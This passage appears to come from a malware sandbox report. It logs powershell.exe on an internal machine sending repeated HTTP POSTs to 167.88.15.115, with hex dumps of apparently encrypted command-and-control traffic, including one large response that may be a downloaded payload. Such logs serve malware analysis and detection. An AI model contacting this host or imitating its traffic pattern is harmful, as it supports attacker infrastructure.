Data Ascii: i45QRLCL^`EA7g -!t~l@SnfM&b6P,B=0Nkp@Ds"`)cv,JQ^YX9e9hrc(71)?}/n}&&b[*?ja>nqCF(@e:MmRKSXJtX$%+SOjk
Aug 28, 2021 00:06:53.258271933 CEST	6454	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 631
Aug 28, 2021 00:06:53.770543098 CEST	6458	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 267 Connection: keep-alive Data Raw: 52 2f af 7c 2c e0 3c 58 c3 23 dc 2b 70 38 c9 ae 29 19 56 7f dc c1 63 6e b5 37 26 13 bc 05 d5 5f 58 64 33 69 f3 12 03 b7 69 39 0b 3f d6 89 75 d1 ee 45 23 f6 fd 75 7c 37 ee fd 9d fa cc bf a3 67 dc 91 69 3b 7f 35 0d 90 f8 43 f2 18 56 8e e1 3a 63 a2 4a 2a 01 a5 97 95 57 99 0b 7d f7 38 c9 47 f6 f7 e6 12 e4 bd 36 66 c0 d8 53 52 e4 b5 9e cd 6b 92 9f bb 0c 8d 78 31 c0 f7 b7 2b 2d 8e 3b b9 17 c9 d1 57 df c5 73 11 de 62 3d 53 3e 09 49 08 c2 c7 2e 91 59 d1 4e b4 04 87 56 ae ab 66 d4 68 19 68 62 08 28 ca cc 60 4f e3 c6 aa a7 6f b7 e5 c5 88 5d bf 1b 7b f7 2c fe 7e 00 7c 2b 92 b5 dc 42 40 60 7f 7b 72 f5 ec 6f 25 e0 70 32 9c 85 9e 14 71 03 75 c0 3b b3 9f 83 38 80 62 a6 ed 06 1f dd 06 87 9b 07 01 95 a1 33 96 b5 c5 9e 2b 9c 77 03 6e 4c b8 f8 79 34 b0 64 98 07 72 66 7f 71 8c 14 e2 8a 07 fa 49 f6 4f 04 f4 4c Data Ascii: R/\|,<X#+p8)Vcn7&_Xd3ii9?uE#u\|7gi;5CV:cJ*W}8G6fSRkx1+-;Wsb=S>I.YNVfhhb(`Oo]{,~\|+B@`{ro%p2qu;8b3+wnLy4drfqIOL
Aug 28, 2021 00:06:53.882932901 CEST	6458	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 236
Aug 28, 2021 00:06:54.403101921 CEST	6460	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 224 Connection: keep-alive Data Raw: 03 26 ea 68 9e 5b 63 25 cd 89 39 41 07 ee 53 9b 39 56 ab 5b 07 11 38 c2 8e d6 ee 58 2a ab 74 71 c1 8f 35 3e 80 97 23 85 04 4f 28 5f c5 10 01 4f 8a e8 4b f8 1b 56 64 19 c1 cc f8 42 6d 73 9d af eb 20 3f a8 e7 1a 9a 77 39 56 04 6e 11 bb 10 c8 f5 84 64 c3 39 41 74 f3 b3 0f 8c 2c 21 14 54 5b 86 32 68 90 79 f7 23 75 77 ae c6 36 de f1 8e 84 3f 9b 2d 01 9d 7e 53 7a 90 81 bf 51 4b 58 32 4f 74 6f c9 7b a6 46 5b f9 63 92 e4 0f 3d 42 40 00 e1 bd 34 3b 6c 5b f2 4a 81 82 06 d9 b3 74 01 7c 57 0b 1c a2 d2 24 23 63 c7 08 a8 a5 91 d6 5c b4 b0 96 cb c4 cf 86 25 51 aa 20 a4 03 7a 4e 26 9b b8 21 26 ad 7a 89 fa d5 20 2b 16 ed 54 d8 41 c3 2a c9 87 bd 33 90 cc 6a 7f a0 ce ab 68 35 45 8f Data Ascii: &h[c%9AS9V[8Xtq5>#O(_OKVdBms ?w9Vnd9At,!T[2hy#uw6?-~SzQKX2Oto{F[c=B@4;l[Jt\|W$#c\%Q zN&!&z +TA3jh5E
Aug 28, 2021 00:06:54.512284040 CEST	6461	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 321
Aug 28, 2021 00:06:55.024313927 CEST	6464	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 309 Connection: keep-alive Data Raw: bc e4 e3 ec 28 bb 38 b3 68 7c 23 69 fb a7 c0 da 15 26 e6 31 25 3f ef 10 6d a4 3a e0 dd 4b 3f 52 44 a4 b8 08 2e 33 8c 96 d1 0b 82 17 82 32 aa d9 e7 f6 1c 14 10 f7 e7 ed 61 d4 ac f4 b9 cd 33 f4 c7 27 41 30 9f b3 5d d2 e5 98 25 54 52 06 5c f8 34 36 b7 26 be 78 39 d1 fd 32 3c 65 a3 ac 96 a6 55 da 9f c3 a0 f6 5f a5 1b 6d 04 11 89 b4 3b 91 58 2c f3 85 59 9b 63 17 6a ae e6 1c 5f 96 2b 79 ff 38 ea d3 7d 44 9d e5 d5 5e 24 76 42 a6 43 03 c3 74 51 e1 ae 8a be de cb aa 2b f0 72 04 ab 85 62 7b 07 ae dc af 33 21 e4 23 c6 8b c9 25 68 ba a5 78 38 22 41 f0 66 f1 d5 ab ff d3 2a 42 46 0a a0 49 84 c9 81 80 bb ce 96 9f 2f b6 ce 24 65 ff 2d d6 63 69 4f c4 c1 08 08 d1 39 cb 26 8c c1 dc 3e 09 75 cd 00 06 b8 7e 22 0f 42 be 18 56 67 70 af 17 4b 23 ec 7c 77 16 31 24 78 bd 8d 1b 79 41 f0 2c 4d 05 98 6d 33 89 6d 4d e4 25 e3 30 2e 2a 15 f1 08 e9 58 09 af d5 60 4f c7 7d b3 ab 7d cd 1d 48 a9 ba 22 13 a2 41 77 00 ce 96 79 f4 70 52 2a 74 3a e4 58 Data Ascii: (8h\|#i&1%?m:K?RD.32a3'A0]%TR\46&x92<eU_m;X,Ycj_+y8}D^$vBCtQ+rb{3!#%hx8"AfBFI/$e-ciO9&>u~"BVgpK#\|w1$xyA,Mm3mM%0.X`O}}H"AwypR*t:X
Aug 28, 2021 00:06:55.133301020 CEST	6464	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 290
Aug 28, 2021 00:06:55.658143997 CEST	6466	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 216 Connection: keep-alive Data Raw: be 23 c9 73 2c fe ef 56 bb 08 6e 27 5d 53 97 6f e1 41 22 19 26 42 68 76 87 9f b8 c5 bc 93 e7 05 3f ea 9c 32 de 14 ce e7 69 92 62 23 1c 0b 3e dc ec d6 18 15 41 0d 66 ce b7 73 ac 91 b7 bf 61 e9 de 9b 8d 78 bd f4 21 91 9d 16 4d e5 26 af 8b 57 c8 01 d4 df 12 fd 0b dc a2 9f b3 0b 4c 96 10 2a e5 e9 fd 11 da eb f7 dd f2 c5 f2 4f 29 da 82 56 09 ea 82 2f 90 8c 8c fe 39 9d 24 16 3e 58 6d 66 d7 ee 8a 8a 45 ee 50 00 10 ed 78 2a 58 bc fb 60 6a eb b1 97 55 0b 15 d0 19 b1 1a 75 32 61 36 83 f3 17 27 74 2e 24 2d 8b a4 fa bc fe 9e 16 20 63 af 91 89 fd 7a 8a 4c 71 74 f2 1a 34 cb 41 d4 11 07 92 2f 79 83 c1 5c f4 84 cb 1c d8 0e c5 de 57 ee 02 91 20 05 84 f7 6b Data Ascii: #s,Vn']SoA"&Bhv?2ib#>Afsax!M&WLO)V/9$>XmfEPxX`jUu2a6't.$- czLqt4A/y\W k

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49715	167.88.15.115	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:05:56.308145046 CEST	1545	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 304 Connection: Keep-Alive
Aug 28, 2021 00:05:56.437504053 CEST	1558	OUT	Data Raw: 28 ad 58 a1 93 f6 7d 79 a1 68 8e bb a7 a7 42 a1 be 04 43 13 4d d1 ad 33 c9 83 28 d0 79 58 5e e1 8f d0 50 e5 9c a8 83 6b 2a cd b7 66 4f 3d 85 00 5e 9b 85 f8 91 d1 7d 18 93 a1 57 63 4b cf 78 e0 3f 6c fe e2 f4 6c 25 9f 87 c7 03 ff 6a 4c 0f 01 d8 1b Data Ascii: (X}yhBCM3(yX^PkfO=^}WcKx?ll%jL%2V5Ni$NCcO@~aI{umM$+6KNjr]3]c@kIGasaEe[\J}=hv16<`jjl}>.udN9
Aug 28, 2021 00:05:56.890126944 CEST	1576	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 281 Connection: keep-alive Data Raw: 2c ca d7 d0 ae 38 88 37 2a 46 44 44 aa 69 2a 81 f7 61 3f a6 e5 c5 8d 59 a6 47 8e 55 66 b5 1e 75 34 33 6d f9 ad b3 b9 11 ed d3 6f b9 8d 83 bb 40 35 1f f6 5f 9e dd c5 08 db 4f 58 91 02 82 27 7a 5c e0 26 05 aa 23 03 c9 a9 96 d5 0e b7 61 92 ce a4 3b 85 35 03 af ce 6f 3d a0 de fc 36 62 08 da 58 80 ee 89 8a 43 f2 cf 73 44 16 bf d2 c8 3b 08 42 7e cf c3 de 87 25 c8 ec 42 79 5e bc e1 cf 1f 83 90 9f 8c a7 2d 45 49 e2 26 c0 7f 5a 65 a4 47 45 22 70 da 06 26 e8 fa 4f 35 0b ee ed 92 82 9c b2 88 aa d7 e5 85 0c 41 36 f4 a2 cb 86 3e b9 f0 75 98 27 98 f6 28 85 c2 1d 80 9e c7 78 c8 fd d3 11 0e bc fa 20 29 5f e1 9d ac 8f 89 d3 fd 30 3c 69 f6 9d 50 72 d9 74 51 16 8b a3 c7 84 71 b9 92 48 0f 4e 13 b3 9e 6e 5a 92 13 5a 1a 0b 05 d1 69 0b 8d 26 fa 76 0f 4d fc 00 dd bb da 17 47 a3 b8 8b 6b 81 5e f0 c3 02 fe 3d 46 2c 48 7f 63 88 88 c2 4f 92 3f 35 ff 25 dc 15 Data Ascii: ,87FDDia?YGUfu43mo@5_OX'z\&#a;5o=6bXCsD;B~%By^-EI&ZeGE"p&O5A6>u'(x )_0<iPrtQqHNnZZi&vMGk^=F,HcO?5%
Aug 28, 2021 00:05:56.896481991 CEST	1576	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 446
Aug 28, 2021 00:05:57.026319027 CEST	1576	OUT	Data Raw: 72 e0 22 cf ab 1d 7d f5 ab 07 4d 15 af 70 39 53 07 19 43 fe 09 35 31 69 d6 37 34 e2 db a2 d4 be 74 3b 0e ef 6c 62 c9 6e 31 a8 ef 93 68 54 d3 bf 1f 0a 03 26 d9 3a 61 3d af b7 f8 75 e7 9a 1a 09 32 8e 9f 74 63 48 e6 a4 4e d4 ce 60 45 9d 02 82 63 74 Data Ascii: r"}Mp9SC51i74t;lbn1hT&:a=u2tcHN`Ect;AhUb_]#]kwtHhe3=P9]<(C/CF/O!20]&4K?x]~?L!")?XpG5Z4b-WhhUywKq:<
Aug 28, 2021 00:05:57.430432081 CEST	1577	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 233 Connection: keep-alive Data Raw: 77 4d bb f3 60 b4 89 c1 d4 c4 5b 25 4e cf 89 e5 fc 35 ee ec b4 50 a1 c8 84 ee b4 fc d4 cf 51 0c a1 41 06 43 59 9d 52 be 00 fa c9 4f c5 d0 ff 44 0b ad a1 92 45 19 04 fb 50 3d aa 97 01 00 2e 7b e2 c1 1b c0 27 36 0c ad e7 d3 6a d9 c6 84 72 ae 40 c1 d9 c8 7f 51 4f e0 9b 95 fc 71 c8 2a c3 6b a4 0b b8 48 8f a0 9f eb 02 2a 9f dd eb 8f 38 07 d5 e4 82 10 f1 04 b0 a1 e4 9f 0d d3 a9 68 07 12 8f 32 81 fb 27 19 bf af ef 54 0c 8b dc 8c 22 a6 59 e6 74 03 86 90 23 b2 54 1d 94 ea dc fd e1 43 de 2f 5b 15 b1 38 89 9f 3e dd 9c 40 cd 12 5d 87 03 f7 4a 86 38 1e 8d 30 cc 7e 8b 9f f7 f7 6d 1a 10 86 8f 9b 99 b1 95 e1 52 7b 10 ff bd c3 bb c4 1d 32 29 6d 09 58 2a 4d bc f0 c8 63 15 e0 86 1f 89 f9 b2 27 b5 7f 08 af 00 Data Ascii: wM`[%N5PQACYRODEP=.{'6jr@QOqkH8h2'T"Yt#TC/[8>@]J80~mR{2)mX*Mc'
Aug 28, 2021 00:05:57.455862045 CEST	1577	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 446
Aug 28, 2021 00:05:57.585344076 CEST	1578	OUT	Data Raw: a3 68 4c 01 ad 5e ef 9d 47 cd d7 1e 96 86 d3 fb 17 56 42 cd 29 5b df 97 f2 43 0b 65 47 7b 21 24 91 d0 74 4d 1b cb 76 a4 9a c6 a6 69 35 df a5 bf 87 72 c0 50 8d f3 61 48 88 b4 0d 6a 53 8b 56 ca ac b4 8b c4 12 86 e1 4a df 9d 33 61 b4 76 62 14 9d 4b Data Ascii: hL^GVB)[CeG{!$tMvi5rPaHjSVJ3avbKp,fQpTwpSU\|L$DDap@Hbcf=Xq:l>zvMi~Y2/W>aY0eTz,)}1url8d(0Ru
Aug 28, 2021 00:05:57.973809958 CEST	1580	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 56730 Connection: keep-alive Data Raw: fc c0 37 4b 49 f8 21 2a 25 72 76 40 e2 9e 08 07 71 85 4a 87 7f 66 18 68 b6 73 b0 4b 57 c5 ab 81 24 d6 b2 8b ea e5 29 5c 6b cc 57 ec fe c8 16 25 91 82 20 b0 93 f8 0a 34 23 96 b9 4a 27 d3 c5 50 67 04 c0 1e 23 b9 9b 1b 6c 1e 7e 0a 0f f8 b0 af 33 ac fd 5d 20 c5 19 de cb 2a fb fc 02 72 22 30 9e 84 67 63 3f 5f 1d 51 e8 1b 95 30 2e e9 84 0d 3b f3 ad ce ca a3 85 43 21 44 f2 37 72 78 3a 0d 35 2e ac a1 96 fd 73 54 08 0d 62 24 ce 2b ce 67 e5 a5 96 7f fe ab cb 57 78 12 6c 3a 42 20 a1 72 1a b8 2b df ff 46 c3 49 9a e7 e1 76 9c 92 71 70 5b ec 9c 7f 67 4b 6a 08 06 2b dc d0 f3 89 4b 7d 25 c4 5d 85 94 41 6f 34 96 00 8a 7e e8 1a af 74 a3 ca 29 4b 57 d2 c7 2b 41 6e 10 4c 23 4c 40 ad 05 64 44 4f 6e 46 d2 45 ef 4c 02 ad 03 6f 8e e1 9b 34 38 1c 8e f3 3d ea d4 53 09 0d 7c d3 6e dc 2c 0d 74 f2 6a 1b b0 59 6d 6e 61 78 8a 4f e7 a9 1c cf 42 02 0f da 54 a2 0b a1 c8 cb f0 4d 3d 39 04 fa 95 92 ab 38 e5 88 bb 7b 4a 42 87 11 98 0a d5 b2 68 c0 c7 41 10 aa 65 f2 60 d7 33 28 72 ac cd 19 b6 d2 30 13 be 08 e2 ca 12 a8 70 d4 2f 91 c3 48 d3 dd 07 2f 18 0e 87 38 ff fe 52 d5 54 74 b6 89 84 10 86 a4 44 fa cf 13 f0 d8 43 34 1f 48 f0 09 eb 70 6f f1 7d aa 09 59 a1 65 d2 14 74 6c bd 8d bd 2b da 3a bc a9 64 8c b6 a5 e8 d4 00 a1 1b 13 6d 1c c2 98 87 06 25 29 ab 13 af 22 b0 ce ea 91 97 02 86 cc 05 4e fa 41 55 87 d2 2a 6a c2 57 71 e3 c7 c8 02 de 4d b3 09 31 01 66 fa 78 e3 fb 10 a3 b0 1f a0 51 3a a9 23 97 06 28 99 57 47 b4 25 62 17 e9 57 49 bf 59 36 77 59 d5 44 6f e4 a6 42 64 22 52 47 1f 81 85 c6 3f 49 44 39 e3 7a 08 1c 33 78 83 b0 1e 3c 87 14 2a 7a 74 ff 36 9a d5 07 e8 3c 48 14 ba 67 4a 25 31 60 41 92 91 84 85 48 c3 98 21 2d 38 41 2e 3a ab 46 a5 b6 47 f3 20 02 35 7a 7e cb a1 db 1c 8c f8 3e 2f 2b fd 61 27 8e 29 56 89 81 ca 7e 6e be 26 43 ed a1 3b fe b4 1a f0 1c 16 29 4e 11 20 d9 b3 df 2a ee 71 9d 40 4d e2 b0 ca ef 1c 99 08 16 62 58 ab 3d e4 54 f0 2e 07 e0 4e 8e a3 98 4d 45 47 fa c5 5f 5e ee 27 d7 7a 14 6e bc 14 a7 ea af 88 5c 20 7d e1 db d6 69 1d 1b 40 8c a0 e3 77 a6 7c b2 fc 1f b0 96 d2 b3 86 f8 fe 79 15 f0 a3 69 fe 18 e1 7f 70 9c 03 81 5d a6 43 2e c2 31 5e 9b 43 6c b5 0d 5b 29 8a 5a e8 ad e3 ec 86 3b a9 e0 ce a4 2f e3 05 00 bc 2e b3 5e 21 33 e5 7e fd b6 86 46 35 d0 88 e5 5b 7c bd 5f b1 eb e8 ed 96 cf 7d 3d b1 0c 28 23 82 31 9b 02 0e 95 2d aa cf f3 a2 b8 2e 45 c3 0b f2 f2 59 d9 29 ce 40 05 17 97 48 91 07 6a 29 bb 64 9b f3 2c 06 d5 e6 54 93 47 c9 ae 35 90 5a 7f 13 57 16 77 51 46 e6 3b 15 4c e7 50 82 3a c0 3b 22 22 20 52 b0 ef 1e a3 de eb fb d3 f0 2d 26 e1 d2 f2 c3 17 a7 c5 f5 57 b9 5e 81 2b d4 14 a8 8a 31 0a e4 e0 68 66 98 39 6c 8b d2 2d 85 d3 2a 39 a8 c9 e3 02 bc 99 14 fd bc 10 a1 27 56 4f 16 7e eb 1e a0 15 db e7 0b e1 da 18 2f 45 86 19 e9 9c 47 f1 73 7c c7 27 51 cd 20 24 70 2d 31 3d 27 b9 75 84 2d 0f 39 a9 c9 01 1b 86 f0 df a5 8a 54 04 82 49 70 54 27 89 2f 70 18 9c 17 fe ed 16 1a 55 ae 61 0e 70 3a 92 25 56 6a c7 50 bf 71 5d 88 65 18 c6 39 96 94 af 8a 39 da df 39 0e 18 b4 f3 7d 6a 42 95 f4 10 c4 ae 54 7a 61 09 39 12 23 0e 09 00 ed 35 3f 80 95 17 e5 80 70 25 68 bb 8a 52 75 58 6c a3 62 27 bf 63 ef ec a9 1e dd 40 5d ce 36 42 48 d6 65 f6 b2 3d f0 78 60 40 30 cc 40 15 ef d4 1f 7b 33 0e 58 61 ef c5 aa d2 96 d5 f1 ce 63 32 11 b9 ff e2 d3 2b 24 fd 77 37 bc 5e 2e cc 73 2c 7f 54 59 b1 04 84 ff 23 05 37 50 13 5f b9 9c 9e c1 b6 c9 d9 04 b1 39 e3 54 76 14 82 d4 01 76 a7 7b 8a 8d 78 c3 15 ca 67 a4 c9 6f d0 8e 0b c2 26 60 a9 07 db d8 e9 27 71 88 64 b2 26 e1 f7 e2 de c4 fe 5d 45 36 6d 47 dd 3f e6 0f 03 ed 7d 0d 8e fb 7f 67 51 95 fe 2a 43 f2 c5 70 04 36 fa 8a 79 f8 58 d8 35 2d c9 7c cd 82 9c b5 93 c6 e9 e0 05 78 f0 c0 d5 3e 7b 1b 26 3f a6 b0 86 eb f5 e0 0e b2 db ff 55 35 34 d4 21 a1 fe 9d 4d c9 c7 6f 54 ed 36 2c fd ed f4 01 f5 1f 11 be cd a7 7f 79 58 10 42 8f 15 5c 2e 0a f8 7d d5 c1 c4 6f a7 30 Data Ascii: 7KI!%rv@qJfhsKW$)\kW% 4#J'Pg#l~3] r"0gc?_Q0.;C!D7rx:5.sTb$+gWxl:B r+FIvqp[gKj+K}%]Ao4~t)KW+AnL#L@dDOnFELo48=S\|n,tjYmnaxOBTM=98{JBhAe`3(r0p/H/8RTtDC4Hpo}Yetl+:dm%)"NAUjWqM1fxQ:#(WG%bWIY6wYDoBd"RG?ID9z3x<zt6<HgJ%1`AH!-8A.:FG 5z~>/+a')V~n&C;)N q@MbX=T.NMEG_^'zn\ }i@w\|yip]C.1^Cl[)Z;/.^!3~F5[\|_}=(#1-.EY)@Hj)d,TG5ZWwQF;LP:;"" R-&W^+1hf9l-9'VO~/EGs\|'Q $p-1='u-9TIpT'/pUap:%VjPq]e999}jBTza9#5?p%hRuXlb'c@]6BHe=x`@0@{3Xac2+$w7^.s,TY#7P_9Tvv{xgo&`'qd&]E6mG?}gQ*Cp6yX5-\|x>{&?U54!MoT6,yXB\.}o0
Aug 28, 2021 00:05:57.973867893 CEST	1581	IN	Data Raw: f3 5c 72 59 66 21 e3 70 41 90 a1 dc 2b eb 7a bb 29 db 37 e5 8b b2 a5 99 8c b2 b4 49 6d 5f 7c 7a 3f 69 6d 01 0a 40 06 46 49 d2 8d 2a 9f 7f 53 1b b1 68 79 55 33 69 02 68 5f 90 cd 1d 5c 19 0d f4 22 5a 65 a6 30 b7 77 7b 8a c0 47 55 ad db 11 81 40 78 Data Ascii: \rYf!pA+z)7Im_\|z?im@FIShyU3ih_\"Ze0w{GU@x"5RRID<@]P6tB.9SC`xdNT{tO#a(8QM/5NN09};yRN=eQt?!J::?p` db)*h-(h`7C?-
Aug 28, 2021 00:05:57.973916054 CEST	1583	IN	Data Raw: 8e c0 15 d2 9d 28 4f ef 64 ff 1d b5 c2 53 f7 5d bc 29 00 22 f1 db 0e 46 df db 36 29 16 59 88 e5 38 b6 de 8f 61 11 4b 89 6b 80 b1 b2 1c a3 3c 92 03 b4 10 fd ad 89 de 79 92 50 3d 60 1d fe dd 36 fc a2 0a e0 50 2f d8 7b af 8b 02 47 b8 ca c3 65 26 ac Data Ascii: (OdS])"F6)Y8aKk<yP=`6P/{Ge&%2"S%W!9#AFs<Q\N9l*R~p2w~hR` _#IO~h::='Xv;3@TB" -Ur&I.}\ '
Aug 28, 2021 00:05:57.973958015 CEST	1584	IN	Data Raw: 85 cc 20 df f1 00 b8 44 f2 ae 3b c3 21 5c fd 7e 85 c6 b7 da 04 61 e4 ad 1c 59 ec c8 57 04 39 59 37 5b b6 ae d6 18 c0 91 40 e2 39 49 3d fe 90 c8 d4 54 89 cb be aa da c5 68 15 b4 2c 16 b2 f0 f5 50 fe 38 9a 15 b2 86 fc 81 ce c2 97 3c ce 5f 65 b7 9d Data Ascii: D;!\~aYW9Y7[@9I=Th,P8<_e8e+SBMBn{d:uPF)A=3N,r?pfSO8l4q=gEqaUN7vt'5aNrgn69R!n1O$.[;4
Aug 28, 2021 00:05:57.973994970 CEST	1585	IN	Data Raw: b2 c9 f1 ab 0d cd 4b 53 44 36 37 26 0d d0 00 83 27 74 d4 27 ae 21 e6 89 ba e7 28 1b 24 75 5b 3c de 5c 22 68 25 15 e2 6f 5e 66 fa 57 59 2d 37 a6 91 79 2b 6f 59 c4 b3 03 3f 72 ee 1e 76 57 eb e0 89 61 21 ed 84 cc 66 f5 a9 ea 03 e7 91 e6 4c 18 4d 05 Data Ascii: KSD67&'t'!($u[<\"h%o^fWY-7y+oY?rvWa!fLMX(\|eIM\<QAfM\2s?j;lzA0]H_5:h-%.<\WN!A9Ssz=o*8AQt<W]!A`9r
Aug 28, 2021 00:05:57.974034071 CEST	1587	IN	Data Raw: bb 8e 7a 5a 9d 65 95 9b 0e 52 f9 2c 5e 92 70 c4 df 37 30 44 b4 4d 2d d5 03 07 cd 47 18 5f a6 71 0c ad c9 96 cc e5 7a 4c 99 95 8e c5 f0 50 c2 0c 6c d6 53 3b 7d ab 5c 42 a7 49 5b 3e a1 51 0a c9 60 fe 3d db 27 34 53 95 49 9d 2d dd b3 64 7a c5 f2 fb Data Ascii: zZeR,^p70DM-G_qzLPlS;}\BI[>Q`='4SI-dzQd]D*3kL]fUc<[9GcFV^\6pewvEZ')x~l\|reWy1^Z11CVR0@>>kDg$q]'k5_\|)CSpGG-NsV[D^$
Aug 28, 2021 00:05:57.974062920 CEST	1587	IN	Data Raw: a8 de 64 2c 1e 56 ca c1 41 3f 56 e7 fd 44 16 b4 08 c1 37 4c c0 a8 96 0b c9 78 b6 71 b7 ef 37 24 2e 79 e7 7d d9 04 a3 94 13 44 4f d6 e8 ee 44 1d cd 7f 54 9f 2c de 63 15 2c a9 c3 f9 9c 05 8d c7 aa 40 b1 31 41 45 08 cc 17 d2 94 f7 51 ac ec a7 33 ac Data Ascii: d,VA?VD7Lxq7$.y}DODT,c,@1AEQ3-'zQ(+`^+=Xp4<mh5(V]q)z{ON2a't2b
Aug 28, 2021 00:05:57.974097967 CEST	1588	IN	Data Raw: 26 89 9c ab 02 dc 2d 1b 47 0f 2e 5a 14 18 f2 63 3b 14 37 29 ec a3 3f 6e be 23 01 a2 6d 6e c2 b7 46 65 ec f0 9f 0c 6b f2 02 e8 74 75 95 fd 6c 0f c2 d8 2b 9e 92 ec 9e 38 ef 7e ff 76 a4 a6 93 d3 f1 11 84 c1 c1 51 22 e2 92 0a 25 9b b6 e3 79 15 bd 76 Data Ascii: &-G.Zc;7)?n#mnFektul+8~vQ"%yvnt!Q~lk(V50>^r/8h:>C"ruy kc};y1P19T:.K_:1\1&`H2k{Ve{d+
Aug 28, 2021 00:05:57.974137068 CEST	1590	IN	Data Raw: e8 11 6d 1e 80 3c bf b3 b3 e2 34 9b 19 62 ab 51 49 0f 1b 7a 6e 56 8b 51 0e 53 66 7d 78 d3 61 8e 72 fc 60 31 54 7b 91 88 cb d1 ba 0e 0f a9 50 c5 8f 5a 74 30 54 73 cf 42 48 71 28 7b b4 43 10 00 1e c4 29 78 8b b3 01 a4 05 7a ba 34 24 04 01 cd 49 41 Data Ascii: m<4bQIznVQSf}xar`1T{PZt0TsBHq({C)xz4$IA_oFC<l\|{=FqZcp*5/j@cCf,9%Yf"?Ck:4izZ]Bi&\! U<F`:tKp(z1q7%<NHNjnY/w1j4N{`h,"
Aug 28, 2021 00:05:57.974174023 CEST	1591	IN	Data Raw: c3 1d 30 b4 7d b6 4b 4d 4e 7f 11 69 5c f3 6c 1a 93 90 6e be 62 8e 0e 92 87 1e ef 4f c1 7d ee 66 e2 c3 5f ce da b8 9e d9 2e 29 24 99 d4 49 e0 24 57 c1 59 fd 94 40 4d 3e 42 82 c0 6c f1 d0 dd f3 a3 8a 0b d8 7b a1 94 bd 9a 60 87 9f 14 27 3d 2c 5d 89 Data Ascii: 0}KMNi\lnbO}f_.)$I$WY@M>Bl{`'=,]V0`Cxo7D 'K$6m+#-$KC\Rw0LN**CK/QSJ\dF?(H_`aH$U2ELF@`@{!{:#ceyOcH
Aug 28, 2021 00:05:58.103416920 CEST	1593	IN	Data Raw: 5b 34 23 c2 fa 8c 2f a9 9b 5a 45 59 0c b4 12 d9 d4 14 e0 f7 b3 dd 3e 52 66 4a 7a 3f 2b 79 03 59 ab ba cf 43 32 61 5b 2b 49 29 c7 4f 31 df 2e 36 72 36 23 13 87 7f 54 76 9b 1c 27 70 e1 51 09 21 e3 ca b2 b0 f6 b9 49 eb 80 ef 9d b6 ec ed d2 4f f4 b3 Data Ascii: [4#/ZEY>RfJz?+yYC2a[+I)O1.6r6#Tv'pQ!IOIBg2/h\|oxQg8`R!-fY<4V\B~/)G 69(c";fp;p+%3?eo%Udg@!Tz+
Aug 28, 2021 00:06:41.272578955 CEST	6382	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 427
Aug 28, 2021 00:06:41.403142929 CEST	6383	OUT	Data Raw: 17 2b b1 18 13 69 d8 86 5f bf ba db f8 72 c5 f7 2e 4d 99 34 97 e6 d6 19 c8 29 9f 57 a3 92 d5 40 f4 08 fb c4 6d 4b 50 5d c8 f8 bc 84 8d 6a e9 53 a3 82 a4 30 f0 7f e0 30 53 98 4e e8 c8 81 e2 cc e8 7a e6 f1 75 01 8a e2 fc 3c 6a 9d 2a 53 8b 5f 3f 4c Data Ascii: +i_r.M4)W@mKP]jS00SNzu<jS_?L"Nu&qgG3C}C-q#:xGo,t`pxUX,5BIb3*_;Pn)(2[[SCSR{HGFd\|y
Aug 28, 2021 00:06:41.806463957 CEST	6384	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 235 Connection: keep-alive Data Raw: df cd 45 7b 58 29 19 dd 60 fd d4 8d 56 12 c7 e7 53 69 55 d6 6f 81 f8 53 96 47 59 f6 1c ad 33 bd bf 9c 23 5d 36 37 1d b8 0a ea e0 61 81 8c 56 c3 c0 5c bb 8b d4 26 18 ad 11 fd 06 fe 20 c7 7c a2 6c b5 19 9d 8a ac 3c 90 91 51 a4 2c f7 66 2d b3 32 a4 cc a3 97 34 93 94 37 36 8d 99 5a b6 c1 82 06 60 79 f4 29 5b 3b 9e d9 47 56 76 44 24 1b cc 99 f1 21 35 69 a2 6e a1 9b 3c 6a 81 0b 97 b1 88 d6 17 c9 eb 95 b2 91 39 2d cd 3e d5 18 c9 3c 17 17 82 f2 3a 21 8b 09 f3 fb 8a 00 57 d1 f6 ec 24 ed 4b 6f 55 7c 0b 2c 61 e2 ea 1d f8 d6 2b af 28 59 bc ef 01 0c 7b 2f 94 15 99 b0 13 e8 1d 00 1a 97 14 80 5e 3c 44 8b a2 0d 51 6a 7e b4 32 99 34 40 3a 8a 37 18 79 d3 a8 4f 43 56 6b 9d d8 48 a8 a3 9e c1 31 ec 3d 15 42 89 b7 99 Data Ascii: E{X)`VSiUoSGY3#]67aV\& \|l<Q,f-2476Z`y)[;GVvD$!5in<j9-><:!W$KoU\|,a+(Y{/^<DQj~24@:7yOCVkH1=B
Aug 28, 2021 00:06:41.913350105 CEST	6384	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 612
